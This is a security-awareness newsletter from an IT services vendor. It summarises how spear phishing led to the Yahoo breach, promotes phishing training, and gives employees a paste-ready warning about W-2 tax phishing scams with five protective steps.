Here's how the FBI says they did it:

The hack began with a spear phishing email sent in early 2014 to a Yahoo company employee. It's unclear how many employees were targeted and how many emails were sent, but it only takes one person to click on a link, and it happened.

Unimaginable that Yahoo did not sufficiently step employees through new-school security awareness training to prevent disasters like this.

It was all over the press, but CSO had the best story about it, with more detail, background and even video: http://www.csoonline.com/article/3180762/data-breach/inside-the-russian-hack-of-yahoo-how-they-did-it.html

Check out the new SkyPort IT service that can test and train your employees to do the right thing with these inbound threats ... go to https://www.skyport-it.com/phishing

Best Regards,
Dan

PS - CHECK OUT OUR USEFUL INFO-STATION (CLICK HERE)

Scam Of The Week: New FBI and IRS Alerts Against W-2 Phishing

There is a wave of W-2 phishing attacks going on. We see these coming in through thousands of reported scam attempts via our Phishing Alert Button. The FBI and the IRS have repeatedly posted warnings that these attacks have started early and that the volume has gone up significantly this year.

Remember those Nigerian prince emails? They are also called 'Nigerian 419' scams because the first wave of them came from Nigeria. The '419' part of the name comes from the section of Nigeria's Criminal Code which outlaws the practice. Well, those gangs have all "growed up" and they are now behind many of today's W-2 scams. It is surprisingly easy to do a little bit of research and send a spoofed email that looks like it is from the CEO.

These W-2 scams are hitting everywhere; even a cyber security contractor was hit with one of these. On Thursday, March 16, the CEO of Defense Point Security, LLC — a Virginia company that bills itself as “the choice provider of cyber security services to the federal government” — told all employees that their W-2 tax data was handed directly to fraudsters after someone inside the company fell for a W-2 spear phishing attack. OUCH!

What To Do About It

I strongly suggest you send this to all employees, and mark it as important for all staff in HR, Legal and Accounting. You're welcome to copy/paste/edit:

"This year, authorities are warning about a massive wave of W-2 tax form phishing scams. Cyber criminals are sending "spoofed" emails that look like they come from the CEO or another C-level executive and ask for a PDF with the W-2 tax information of all employees. The W-2's have all the information needed to file fraudulent tax returns and steal anyone's identity.

Here are five steps to prevent an incredible amount of hassle and possible damage:

1) If you receive any email requesting any kind of W-2 tax information, pick up the phone and verify that request before you email anything to anybody.

2) File your taxes at the state and federal level as quickly as you can, or file for an October 16 extension early, before the bad guys can file a bogus claim.

3) Consider filing form 14039 and request an IP PIN from the government. Form 14039 requires you to state you believe you are likely to be a victim of identity fraud. Even if cyber criminals haven’t tried to file a bogus tax return in your name, virtually every American's data has been stolen, which can lead to your identity being stolen.

4) Every 4 months, get a free once-a-year credit report from one of the three major credit bureaus. Get them on your calendar (cycle through them) and dispute any unauthorized activity.

5) Place a "security freeze" or "credit freeze" on your files with all three credit bureaus to prevent ID thieves from assuming your identity and opening up a line of credit in your name.

This time of year, it is more important than ever to Think Before You Click!"

Best Regards,
Dan
